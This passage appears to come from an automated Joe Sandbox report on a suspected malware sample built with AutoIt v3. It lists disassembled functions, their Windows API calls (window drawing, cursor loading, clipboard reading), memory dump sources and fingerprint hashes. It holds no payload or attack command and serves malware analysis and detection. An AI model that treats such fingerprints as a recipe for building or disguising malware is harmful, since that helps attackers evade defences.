                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Window$Create$Object$Global$Rect$DeleteFileSelect$MessageSendShow$AdjustAllocCapsClientCloseCopyDesktopDestroyDeviceFaceFontFreeHandleImageLoadLockMovePictureReadReleaseSizeStockStreamTextUnlock
                                                                                                                                                                  • String ID: $AutoIt v3$DISPLAY$static
                                                                                                                                                                  • API String ID: 1538203242-2373415609
                                                                                                                                                                  • Opcode ID: 6d6993f212ed0893db9275c3f84f169bec7eeddded5228c42ae13acbc858d7fb
                                                                                                                                                                  • Instruction ID: 0470743097681e939cd033c9659fc80dd101af82a4c7fdd8c03ae3a829a790b9
                                                                                                                                                                  • Opcode Fuzzy Hash: 6d6993f212ed0893db9275c3f84f169bec7eeddded5228c42ae13acbc858d7fb
                                                                                                                                                                  • Instruction Fuzzy Hash: 92027D71600204EFDB14DF64CD89FAE7BB9BB48305F108569FA05AB292D7B4ED05CB68
                                                                                                                                                                  Function 004417BF Relevance: 49.8, APIs: 33, Instructions: 275COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetSysColor.USER32(00000012), ref: 0044181E
                                                                                                                                                                  • SetTextColor.GDI32(?,?), ref: 00441826
                                                                                                                                                                  • GetSysColorBrush.USER32(0000000F), ref: 0044183D
                                                                                                                                                                  • GetSysColor.USER32(0000000F), ref: 00441849
                                                                                                                                                                  • SetBkColor.GDI32(?,?), ref: 00441864
                                                                                                                                                                  • SelectObject.GDI32(?,?), ref: 00441874
                                                                                                                                                                  • InflateRect.USER32(?,000000FF,000000FF), ref: 004418AA
                                                                                                                                                                  • GetSysColor.USER32(00000010), ref: 004418B2
                                                                                                                                                                  • CreateSolidBrush.GDI32(00000000), ref: 004418B9
                                                                                                                                                                  • FrameRect.USER32(?,?,00000000), ref: 004418CA
                                                                                                                                                                  • DeleteObject.GDI32(?), ref: 004418D5
                                                                                                                                                                  • InflateRect.USER32(?,000000FE,000000FE), ref: 0044192F
                                                                                                                                                                  • FillRect.USER32(?,?,?), ref: 00441970
                                                                                                                                                                    • Part of subcall function 004308EF: GetSysColor.USER32(0000000E), ref: 00430913
                                                                                                                                                                    • Part of subcall function 004308EF: SetTextColor.GDI32(?,00000000), ref: 0043091B
                                                                                                                                                                    • Part of subcall function 004308EF: GetSysColorBrush.USER32(0000000F), ref: 0043094E
                                                                                                                                                                    • Part of subcall function 004308EF: GetSysColor.USER32(0000000F), ref: 00430959
                                                                                                                                                                    • Part of subcall function 004308EF: GetSysColor.USER32(00000011), ref: 00430979
                                                                                                                                                                    • Part of subcall function 004308EF: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0043098B
                                                                                                                                                                    • Part of subcall function 004308EF: SelectObject.GDI32(?,00000000), ref: 0043099C
                                                                                                                                                                    • Part of subcall function 004308EF: SetBkColor.GDI32(?,?), ref: 004309A6
                                                                                                                                                                    • Part of subcall function 004308EF: SelectObject.GDI32(?,?), ref: 004309B4
                                                                                                                                                                    • Part of subcall function 004308EF: InflateRect.USER32(?,000000FF,000000FF), ref: 004309D9
                                                                                                                                                                    • Part of subcall function 004308EF: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 004309F4
                                                                                                                                                                    • Part of subcall function 004308EF: GetWindowLongW.USER32(?,000000F0), ref: 00430A09
                                                                                                                                                                    • Part of subcall function 004308EF: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00430A29
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Color$Rect$Object$BrushInflateSelect$CreateText$DeleteFillFrameLongMessageRoundSendSolidWindow
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 69173610-0
                                                                                                                                                                  • Opcode ID: 365d04d24795c841fcdc701f8413be148c47fe6b32405cf858c48fdb14120b33
                                                                                                                                                                  • Instruction ID: 7a723b7ebc9985c742df47702d768576d0729d4f0beaa2415310c4eb73739e4f
                                                                                                                                                                  • Opcode Fuzzy Hash: 365d04d24795c841fcdc701f8413be148c47fe6b32405cf858c48fdb14120b33
                                                                                                                                                                  • Instruction Fuzzy Hash: 76B15BB1508301AFD304DF64DD88A6FB7F8FB88720F104A2DF996922A0D774E945CB66
                                                                                                                                                                  Function 004590BD Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 291windowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • DestroyWindow.USER32(?), ref: 004590F2
                                                                                                                                                                  • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 004591AF
                                                                                                                                                                  • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 004591EF
                                                                                                                                                                  • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 00459200
                                                                                                                                                                  • CreateWindowExW.USER32(00000008,AutoIt v3,00000000,?,88C00000,?,?,?,00000001,?,00000000,00000000), ref: 00459242
                                                                                                                                                                  • GetClientRect.USER32(00000000,?), ref: 0045924E
                                                                                                                                                                  • CreateWindowExW.USER32(00000000,static,00000000,?,50000000,?,00000004,00000500,00000018,?,00000000,00000000), ref: 00459290
                                                                                                                                                                  • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004592A2
                                                                                                                                                                  • GetStockObject.GDI32(00000011), ref: 004592AC
                                                                                                                                                                  • SelectObject.GDI32(00000000,00000000), ref: 004592B4
                                                                                                                                                                  • GetTextFaceW.GDI32(00000000,00000040,?), ref: 004592C4
                                                                                                                                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004592CD
                                                                                                                                                                  • DeleteDC.GDI32(00000000), ref: 004592D6
                                                                                                                                                                  • CreateFontW.GDI32(?,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 0045931C
                                                                                                                                                                  • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00459334
                                                                                                                                                                  • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,?,00000000,00000000,00000000), ref: 0045936E
                                                                                                                                                                  • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00459382
                                                                                                                                                                  • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00459393
                                                                                                                                                                  • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,?,00000000,00000000,00000000), ref: 004593C8
                                                                                                                                                                  • GetStockObject.GDI32(00000011), ref: 004593D3
                                                                                                                                                                  • SendMessageW.USER32(?,00000030,00000000), ref: 004593E3
                                                                                                                                                                  • ShowWindow.USER32(?,00000004,?,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 004593EE
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                                                                                                                  • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                                                                                                                  • API String ID: 2910397461-517079104
                                                                                                                                                                  • Opcode ID: 7a94e82ab5e7eba8c21ff2ad013f2909889a905bd0bc04285d9267b4528ddb10
                                                                                                                                                                  • Instruction ID: c5562805fc82c6770b180505aab83e69ed0b4cba248239bed49a3b83ebf26fc7
                                                                                                                                                                  • Opcode Fuzzy Hash: 7a94e82ab5e7eba8c21ff2ad013f2909889a905bd0bc04285d9267b4528ddb10
                                                                                                                                                                  • Instruction Fuzzy Hash: 71A18371B40214BFEB14DF64CD8AFAE7769AB44711F208529FB05BB2D1D6B4AD00CB68
                                                                                                                                                                  Function 00430737 Relevance: 43.6, APIs: 29, Instructions: 108COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • LoadCursorW.USER32(00000000,00007F89), ref: 00430754
                                                                                                                                                                  • SetCursor.USER32(00000000), ref: 0043075B
                                                                                                                                                                  • LoadCursorW.USER32(00000000,00007F8A), ref: 0043076C
                                                                                                                                                                  • SetCursor.USER32(00000000), ref: 00430773
                                                                                                                                                                  • LoadCursorW.USER32(00000000,00007F03), ref: 00430784
                                                                                                                                                                  • SetCursor.USER32(00000000), ref: 0043078B
                                                                                                                                                                  • LoadCursorW.USER32(00000000,00007F8B), ref: 0043079C
                                                                                                                                                                  • SetCursor.USER32(00000000), ref: 004307A3
                                                                                                                                                                  • LoadCursorW.USER32(00000000,00007F01), ref: 004307B4
                                                                                                                                                                  • SetCursor.USER32(00000000), ref: 004307BB
                                                                                                                                                                  • LoadCursorW.USER32(00000000,00007F88), ref: 004307CC
                                                                                                                                                                  • SetCursor.USER32(00000000), ref: 004307D3
                                                                                                                                                                  • LoadCursorW.USER32(00000000,00007F86), ref: 004307E4
                                                                                                                                                                  • SetCursor.USER32(00000000), ref: 004307EB
                                                                                                                                                                  • LoadCursorW.USER32(00000000,00007F83), ref: 004307FC
                                                                                                                                                                  • SetCursor.USER32(00000000), ref: 00430803
                                                                                                                                                                  • LoadCursorW.USER32(00000000,00007F85), ref: 00430814
                                                                                                                                                                  • SetCursor.USER32(00000000), ref: 0043081B
                                                                                                                                                                  • LoadCursorW.USER32(00000000,00007F82), ref: 0043082C
                                                                                                                                                                  • SetCursor.USER32(00000000), ref: 00430833
                                                                                                                                                                  • LoadCursorW.USER32(00000000,00007F84), ref: 00430844
                                                                                                                                                                  • SetCursor.USER32(00000000), ref: 0043084B
                                                                                                                                                                  • LoadCursorW.USER32(00000000,00007F04), ref: 0043085C
                                                                                                                                                                  • SetCursor.USER32(00000000), ref: 00430863
                                                                                                                                                                  • LoadCursorW.USER32(00000000,00007F02), ref: 00430874
                                                                                                                                                                  • SetCursor.USER32(00000000), ref: 0043087B
                                                                                                                                                                  • SetCursor.USER32(00000000), ref: 00430887
                                                                                                                                                                  • LoadCursorW.USER32(00000000,00007F00), ref: 00430898
                                                                                                                                                                  • SetCursor.USER32(00000000), ref: 0043089F
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Cursor$Load
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1675784387-0
                                                                                                                                                                  • Opcode ID: c7473186da6a924b3206e1e01d9541ab2871430d40d1833d6e341d2f3415b8bd
                                                                                                                                                                  • Instruction ID: ada3a8d1d263842f4cf6b5ed80e179871947c4c62c163598e9ab22da256eac1d
                                                                                                                                                                  • Opcode Fuzzy Hash: c7473186da6a924b3206e1e01d9541ab2871430d40d1833d6e341d2f3415b8bd
                                                                                                                                                                  • Instruction Fuzzy Hash: AF3101729C8205B7EA546BE0BE1DF5D3618AB28727F004836F309B54D09AF551509B6D
                                                                                                                                                                  Function 004308EF Relevance: 42.2, APIs: 28, Instructions: 200windowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetSysColor.USER32(0000000E), ref: 00430913
                                                                                                                                                                  • SetTextColor.GDI32(?,00000000), ref: 0043091B
                                                                                                                                                                  • GetSysColor.USER32(00000012), ref: 00430933
                                                                                                                                                                  • SetTextColor.GDI32(?,?), ref: 0043093B
                                                                                                                                                                  • GetSysColorBrush.USER32(0000000F), ref: 0043094E
                                                                                                                                                                  • GetSysColor.USER32(0000000F), ref: 00430959
                                                                                                                                                                  • CreateSolidBrush.GDI32(?), ref: 00430962
                                                                                                                                                                  • GetSysColor.USER32(00000011), ref: 00430979
                                                                                                                                                                  • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0043098B
                                                                                                                                                                  • SelectObject.GDI32(?,00000000), ref: 0043099C
                                                                                                                                                                  • SetBkColor.GDI32(?,?), ref: 004309A6
                                                                                                                                                                  • SelectObject.GDI32(?,?), ref: 004309B4
                                                                                                                                                                  • InflateRect.USER32(?,000000FF,000000FF), ref: 004309D9
                                                                                                                                                                  • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 004309F4
                                                                                                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00430A09
                                                                                                                                                                  • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00430A29
                                                                                                                                                                  • GetWindowTextW.USER32(00000000,00000000,?), ref: 00430A5A
                                                                                                                                                                  • InflateRect.USER32(?,000000FD,000000FD), ref: 00430A86
                                                                                                                                                                  • DrawFocusRect.USER32(?,?), ref: 00430A91
                                                                                                                                                                  • GetSysColor.USER32(00000011), ref: 00430A9F
                                                                                                                                                                  • SetTextColor.GDI32(?,00000000), ref: 00430AA7
                                                                                                                                                                  • DrawTextW.USER32(?,?,000000FF,?,00000105), ref: 00430ABC
                                                                                                                                                                  • SelectObject.GDI32(?,?), ref: 00430AD0
                                                                                                                                                                  • DeleteObject.GDI32(00000105), ref: 00430ADC
                                                                                                                                                                  • SelectObject.GDI32(?,?), ref: 00430AE3
                                                                                                                                                                  • DeleteObject.GDI32(?), ref: 00430AE9
                                                                                                                                                                  • SetTextColor.GDI32(?,?), ref: 00430AF0
                                                                                                                                                                  • SetBkColor.GDI32(?,?), ref: 00430AFB
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Color$ObjectText$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1582027408-0
                                                                                                                                                                  • Opcode ID: 641c283377bf90580b0f33fdf55f369ee1c61e001cb7cbed706b0c86a5b2892e
                                                                                                                                                                  • Instruction ID: b12033eb3fa9204049de4d7caedd8dcf025edfa44633034d6aae7949f8ecba99
                                                                                                                                                                  • Opcode Fuzzy Hash: 641c283377bf90580b0f33fdf55f369ee1c61e001cb7cbed706b0c86a5b2892e
                                                                                                                                                                  • Instruction Fuzzy Hash: 6F713071900209BFDB04DFA8DD88EAEBBB9FF48710F104619F915A7290D774A941CFA8
                                                                                                                                                                  Function 004565B2 Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 291windowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetCursorPos.USER32(?), ref: 004566AE
                                                                                                                                                                  • GetDesktopWindow.USER32 ref: 004566C3
                                                                                                                                                                  • GetWindowRect.USER32(00000000), ref: 004566CA
                                                                                                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00456722
                                                                                                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00456735
                                                                                                                                                                  • DestroyWindow.USER32(?), ref: 00456746
                                                                                                                                                                  • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00456794
                                                                                                                                                                  • SendMessageW.USER32(00000000,00000432,00000000,0000002C), ref: 004567B2
                                                                                                                                                                  • SendMessageW.USER32(?,00000418,00000000,?), ref: 004567C6
                                                                                                                                                                  • SendMessageW.USER32(?,00000439,00000000,0000002C), ref: 004567D6
                                                                                                                                                                  • SendMessageW.USER32(?,00000421,?,?), ref: 004567F6
                                                                                                                                                                  • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 0045680C
                                                                                                                                                                  • IsWindowVisible.USER32(?), ref: 0045682C
                                                                                                                                                                  • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00456848
                                                                                                                                                                  • SendMessageW.USER32(?,00000411,00000001,0000002C), ref: 0045685C
                                                                                                                                                                  • GetWindowRect.USER32(?,?), ref: 00456873
                                                                                                                                                                  • MonitorFromPoint.USER32(?,00000001,00000002), ref: 00456891
                                                                                                                                                                  • GetMonitorInfoW.USER32(00000000,?), ref: 004568A9
                                                                                                                                                                  • CopyRect.USER32(?,?), ref: 004568BE
                                                                                                                                                                  • SendMessageW.USER32(?,00000412,00000000), ref: 00456914
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: MessageSendWindow$Rect$LongMonitor$CopyCreateCursorDesktopDestroyFromInfoPointVisible
                                                                                                                                                                  • String ID: ($,$tooltips_class32
                                                                                                                                                                  • API String ID: 225202481-3320066284
                                                                                                                                                                  • Opcode ID: d36279d6046af7916fa8cb53b873a9c87cdaa8c87180e7b1c59dea88ca998a74
                                                                                                                                                                  • Instruction ID: fcdb4dd5bfb9c4cfeeadc9569793f3eee26ed74f2078e1bfb0220ba6a1b85fea
                                                                                                                                                                  • Opcode Fuzzy Hash: d36279d6046af7916fa8cb53b873a9c87cdaa8c87180e7b1c59dea88ca998a74
                                                                                                                                                                  • Instruction Fuzzy Hash: 4CB17170A00205AFDB54DFA4CD85BAEB7B4BF48304F10895DE919BB282D778A949CB58
                                                                                                                                                                  Function 0046DCB4 Relevance: 36.2, APIs: 24, Instructions: 247clipboardCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • OpenClipboard.USER32(?), ref: 0046DCE7
                                                                                                                                                                  • IsClipboardFormatAvailable.USER32(0000000D), ref: 0046DCF5
                                                                                                                                                                  • GetClipboardData.USER32(0000000D), ref: 0046DD01
                                                                                                                                                                  • CloseClipboard.USER32 ref: 0046DD0D
                                                                                                                                                                  • GlobalLock.KERNEL32(00000000), ref: 0046DD37
                                                                                                                                                                  • CloseClipboard.USER32 ref: 0046DD41
                                                                                                                                                                  • IsClipboardFormatAvailable.USER32(00000001), ref: 0046DD81
                                                                                                                                                                  • GetClipboardData.USER32(00000001), ref: 0046DD8D
                                                                                                                                                                  • CloseClipboard.USER32 ref: 0046DD99
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Clipboard$Close$AvailableDataFormat$GlobalLockOpen
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 15083398-0
                                                                                                                                                                  • Opcode ID: 5d52f7a8e2fbd0ab087c8c139685d9916ac200a5779b15fccd04bfb456a25eb2
                                                                                                                                                                  • Instruction ID: c6f05cb0c77453757aa6b00544986da50a17ac1627668c5aecb5782462309948
                                                                                                                                                                  • Opcode Fuzzy Hash: 5d52f7a8e2fbd0ab087c8c139685d9916ac200a5779b15fccd04bfb456a25eb2
                                                                                                                                                                  • Instruction Fuzzy Hash: CE81B072704201ABD310EF65DD8AB5EB7A8FF94315F00482EF605E72D1EB74E905879A
                                                                                                                                                                  Function 00471BC9 Relevance: 35.3, APIs: 18, Strings: 2, Instructions: 313windowtimeCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetWindowRect.USER32(?,?), ref: 00471CF7
                                                                                                                                                                  • GetClientRect.USER32(?,?), ref: 00471D05
                                                                                                                                                                  • GetSystemMetrics.USER32(00000007), ref: 00471D0D
                                                                                                                                                                  • GetSystemMetrics.USER32(00000008), ref: 00471D20
                                                                                                                                                                  • GetSystemMetrics.USER32(00000004), ref: 00471D42
                                                                                                                                                                  • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00471D71
                                                                                                                                                                  • GetSystemMetrics.USER32(00000007), ref: 00471D79
                                                                                                                                                                  • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00471DA3
                                                                                                                                                                  • GetSystemMetrics.USER32(00000008), ref: 00471DAB
                                                                                                                                                                  • GetSystemMetrics.USER32(00000004), ref: 00471DCF
                                                                                                                                                                  • SetRect.USER32(?,00000000,00000000,?,?), ref: 00471DEE
                                                                                                                                                                  • AdjustWindowRectEx.USER32(?,?,00000000,00000040), ref: 00471DFF
                                                                                                                                                                  • CreateWindowExW.USER32(00000040,AutoIt v3 GUI,?,?,?,?,?,?,?,00000000,00400000,00000000), ref: 00471E35
                                                                                                                                                                  • SetWindowLongW.USER32(00000000,000000EB,?), ref: 00471E6E
                                                                                                                                                                  • GetClientRect.USER32(?,?), ref: 00471E8A
                                                                                                                                                                  • GetStockObject.GDI32(00000011), ref: 00471EA6
                                                                                                                                                                  • SendMessageW.USER32(?,00000030,00000000), ref: 00471EB2
                                                                                                                                                                  • SetTimer.USER32(00000000,00000000,00000028,00462986), ref: 00471ED9
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: System$Metrics$Rect$Window$ClientInfoParameters$AdjustCreateLongMessageObjectSendStockTimer
                                                                                                                                                                  • String ID: @$AutoIt v3 GUI
                                                                                                                                                                  • API String ID: 2872485747-3359773793
                                                                                                                                                                  • Opcode ID: 38afc10233d910aeb777c22d5c81fb6d4fd9d3b73f63716144b787bfa93c5fa7
                                                                                                                                                                  • Instruction ID: 8cf5fd9e7b0abf2f472dad9b41bae804ea9cb1b32c1b51d65689880f1cfe2d6c
                                                                                                                                                                  • Opcode Fuzzy Hash: 38afc10233d910aeb777c22d5c81fb6d4fd9d3b73f63716144b787bfa93c5fa7
                                                                                                                                                                  • Instruction Fuzzy Hash: 7DC17F71A402059FDB14DFA8DD85BAF77B4FB58714F10862EFA09A7290DB78A840CB58
                                                                                                                                                                  Function 00455A89 Relevance: 31.9, APIs: 21, Instructions: 395COMMON
                                                                                                                                                                  Download Yara Rule
